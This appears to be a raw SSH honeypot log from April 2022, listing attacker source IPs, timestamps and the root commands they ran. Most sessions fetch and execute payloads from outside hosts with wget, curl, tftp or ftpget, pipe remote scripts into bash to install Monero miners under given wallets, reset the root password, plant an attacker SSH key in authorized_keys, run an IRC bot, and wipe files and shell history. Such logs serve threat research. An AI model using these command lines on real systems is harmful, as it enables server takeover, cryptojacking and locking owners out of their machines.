lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 159.65.113.87 11-Apr-2022 23:15:07 ssh2 root
Exec cd /tmp ; wget http://208.115.245.158/c --no-check-certificate; curl -O http://208.115.245.158/c ; chmod 777 c* ; ./c ; rm -rf -c* ; history -c
cd /tmp
wget http://208.115.245.158/c --no-check-certificate
curl -O http://208.115.245.158/c
chmod 777 c*
./c
rm -rf -c*
history -c

From 130.162.183.218 12-Apr-2022 05:32:15 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 86.125.92.76 12-Apr-2022 14:12:53 ssh2 root
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
ls
ls
exit

From 179.43.154.138 12-Apr-2022 19:18:38 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash

From 163.123.142.166 12-Apr-2022 23:27:15 ssh2 root
Exec wget 194.31.98.248/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 194.31.98.248/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 122.155.187.139 13-Apr-2022 03:58:18 ssh2 root
Exec uname -a; cd /tmp ; export HOME=/usr/lib ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN ; export HOME=/root
uname -a
cd /tmp
export HOME=/usr/lib
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN
export HOME=/root

From 103.9.36.251 13-Apr-2022 11:26:16 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu
Exec uname -a ; lscpu
uname -a
lscpu

From 163.123.142.166 14-Apr-2022 11:27:48 ssh2 root
Exec wget 23.94.22.13/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 23.94.22.13/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 86.125.92.76 14-Apr-2022 15:22:42 ssh2 root
lscpu
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
ls

From 179.43.154.137 15-Apr-2022 00:41:26 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
lspci | grep -i --color 'vga\|3d\|2d'
echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash

From 164.92.220.20 15-Apr-2022 04:50:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.160.54/onion002
curl -O http://45.90.160.54/onion002
chmod 777 onion002
sh onion002
tftp 45.90.160.54 -c get onion002.sh
chmod 777 onion002.sh
sh onion002.sh
tftp -r .sh -g 45.90.160.54
chmod 777 onion002
sh onion002
ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec /ip cloud print
/ip cloud print

From 193.105.134.95 15-Apr-2022 13:40:23 ssh2 root
lscpu
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
ls

From 179.43.154.138 15-Apr-2022 19:29:30 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d11es234e3123g4tij24jtiu3ji4rg|chpasswd|bash

From 164.92.183.246 16-Apr-2022 00:36:02 ssh2 root
Exec cd /tmp ; wget 164.92.142.65/irc.pl ; perl irc.pl ; rm -rf irc.pl ; curl -O 164.92.142.65/irc.pl ; perl irc.pl ; rm -rf irc.pl ; history -c
cd /tmp
wget 164.92.142.65/irc.pl
perl irc.pl
rm -rf irc.pl
curl -O 164.92.142.65/irc.pl
perl irc.pl
rm -rf irc.pl
history -c

From 130.162.183.218 16-Apr-2022 20:19:42 ssh2 root
Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1
curl -O http://45.90.161.105/systemd
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1

From 64.31.47.250 16-Apr-2022 22:20:47 ssh2 root
Exec cd /tmp; rm -rf wget*; curl -O http://45.95.55.24/wget.sh; wget http://45.95.55.24/wget.sh; chmod 777 wget.sh; ./wget.sh
cd /tmp
rm -rf wget*
curl -O http://45.95.55.24/wget.sh
wget http://45.95.55.24/wget.sh
chmod 777 wget.sh
./wget.sh

From 64.31.47.254 16-Apr-2022 22:25:41 ssh2 root
Exec cd /tmp; rm -rf wget*; curl -O http://45.95.55.24/wget.sh; wget http://45.95.55.24/wget.sh; chmod 777 wget.sh; ./wget.sh
cd /tmp
rm -rf wget*
curl -O http://45.95.55.24/wget.sh
wget http://45.95.55.24/wget.sh
chmod 777 wget.sh
./wget.sh

From 179.43.154.137 17-Apr-2022 06:20:54 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
lspci | grep -i --color 'vga\|3d\|2d'
echo root:ggds264e3123g4tij24jti1u3ji23rg|chpasswd|bash

From 164.92.220.20 17-Apr-2022 13:00:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.160.54/onion002
curl -O http://45.90.160.54/onion002
chmod 777 onion002
sh onion002
tftp 45.90.160.54 -c get onion002.sh
chmod 777 onion002.sh
sh onion002.sh
tftp -r .sh -g 45.90.160.54
chmod 777 onion002
sh onion002
ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 179.43.154.138 17-Apr-2022 13:57:43 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:d11es2@34e3123g4tij24jtiu3ji4rg|chpasswd|bash
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d11es2@34e3123g4tij24jtiu3ji4rg|chpasswd|bash

From 86.125.92.76 17-Apr-2022 19:36:52 ssh2 root
top
lscpui
lscpu

From 195.3.147.60 17-Apr-2022 19:39:29 ssh2 root
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
ls

From 86.125.92.76 17-Apr-2022 20:40:42 ssh2 root
top

From 64.31.61.94 18-Apr-2022 01:07:39 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://136.144.41.55/Saitama.sh
curl -O http://136.144.41.55/Saitama.sh
chmod 777 Saitama.sh
sh Saitama.sh
tftp 136.144.41.55 -c get tSaitama.sh
chmod 777 tSaitama.sh
sh tSaitama.sh
tftp -r tSaitama2.sh -g 136.144.41.55
chmod 777 tSaitama2.sh
sh tSaitama2.sh
ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh
sh Saitama1.sh
rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh
rm -rf *

From 64.31.47.206 18-Apr-2022 01:55:43 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://136.144.41.55/Saitama.sh
curl -O http://136.144.41.55/Saitama.sh
chmod 777 Saitama.sh
sh Saitama.sh
tftp 136.144.41.55 -c get tSaitama.sh
chmod 777 tSaitama.sh
sh tSaitama.sh
tftp -r tSaitama2.sh -g 136.144.41.55
chmod 777 tSaitama2.sh
sh tSaitama2.sh
ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh
sh Saitama1.sh
rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh
rm -rf *

From 138.197.21.218 18-Apr-2022 04:08:58 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 222.255.115.237 18-Apr-2022 05:07:24 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 72.167.41.167 18-Apr-2022 05:56:53 ssh2 root
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~

From 64.31.47.254 18-Apr-2022 15:47:52 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.95.55.24/wget.sh; curl -O http://45.95.55.24/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 45.95.55.24 -c get twget.sh; chmod 777 twget.sh; sh twget.sh; tftp -r twget2.sh -g 45.95.55.24; chmod 777 twget2.sh; sh twget2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh; sh wget1.sh; rm -rf wget.sh twget.sh twget2.sh wget1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.95.55.24/wget.sh
curl -O http://45.95.55.24/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 45.95.55.24 -c get twget.sh
chmod 777 twget.sh
sh twget.sh
tftp -r twget2.sh -g 45.95.55.24
chmod 777 twget2.sh
sh twget2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh
sh wget1.sh
rm -rf wget.sh twget.sh twget2.sh wget1.sh
rm -rf *

From 64.31.61.90 18-Apr-2022 17:42:31 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.95.55.24/wget.sh; curl -O http://45.95.55.24/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 45.95.55.24 -c get twget.sh; chmod 777 twget.sh; sh twget.sh; tftp -r twget2.sh -g 45.95.55.24; chmod 777 twget2.sh; sh twget2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh; sh wget1.sh; rm -rf wget.sh twget.sh twget2.sh wget1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.95.55.24/wget.sh
curl -O http://45.95.55.24/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 45.95.55.24 -c get twget.sh
chmod 777 twget.sh
sh twget.sh
tftp -r twget2.sh -g 45.95.55.24
chmod 777 twget2.sh
sh twget2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.55.24 wget1.sh wget1.sh
sh wget1.sh
rm -rf wget.sh twget.sh twget2.sh wget1.sh
rm -rf *

From 194.165.16.5 19-Apr-2022 00:18:47 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh
sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
echo -e "xox0\nxox0" | passwd

From 164.92.220.20 19-Apr-2022 01:28:50 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r .sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.90.160.54/onion002
curl -O http://45.90.160.54/onion002
chmod 777 onion002
sh onion002
tftp 45.90.160.54 -c get onion002.sh
chmod 777 onion002.sh
sh onion002.sh
tftp -r .sh -g 45.90.160.54
chmod 777 onion002
sh onion002
ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 194.165.16.5 19-Apr-2022 02:16:00 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh; sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj; echo -e "xox0\nxox0" | passwd
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
wget https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh
sh setup_c3pool_miner.sh 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj
echo -e "xox0\nxox0" | passwd

From 161.35.89.214 19-Apr-2022 11:07:35 ssh2 root
Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main

From 64.225.69.252 20-Apr-2022 15:06:46 ssh2 root
Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main && rm -rf *
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
rm -rf *

From 161.35.89.112 20-Apr-2022 19:07:28 ssh2 root
Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main

From 64.225.64.101 21-Apr-2022 11:58:06 ssh2 root
Exec wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main && rm -rf *
wget http://45.90.161.105/systemd
chmod +x *
./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
rm -rf *

From 185.28.39.119 21-Apr-2022 23:50:26 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh; tftp -g -r sh 37.0.11.168; chmod 777 sh;./sh root; rm -rf sh; echo -e gay
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh
tftp -g -r sh 37.0.11.168
chmod 777 sh
./sh root
rm -rf sh
echo -e gay

From 185.28.39.119 22-Apr-2022 00:05:12 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh; tftp -g -r sh 37.0.11.168; chmod 777 sh;./sh root; rm -rf sh; echo -e gay
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://37.0.11.168/sh || curl -O http://37.0.11.168/sh || tftp 37.0.11.168 -c get sh
tftp -g -r sh 37.0.11.168
chmod 777 sh
./sh root
rm -rf sh
echo -e gay

From 179.43.142.83 24-Apr-2022 14:44:18 ssh2 root
Exec echo root:dss4tij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dss4tij24jtiu3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.154.185 24-Apr-2022 23:58:47 ssh2 root
Exec echo root:dss4tij24jtiu3ji43rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dss4tij24jtiu3ji43rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 209.141.57.143 25-Apr-2022 00:37:06 ssh2 root
Exec cd /tmp && wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./sshd && ./krane 123456
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
chmod +x *
./sshd
./krane 123456

From 209.141.57.143 25-Apr-2022 01:37:04 ssh2 root
Exec cd /tmp && wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./sshd && ./krane 123456
cd /tmp
wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar
tar xvf miner.tar
cd miner
chmod +x *
./sshd
./krane 123456

From 185.28.39.119 25-Apr-2022 09:20:41 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh
cd /tmp
cd /dev
cd /mnt
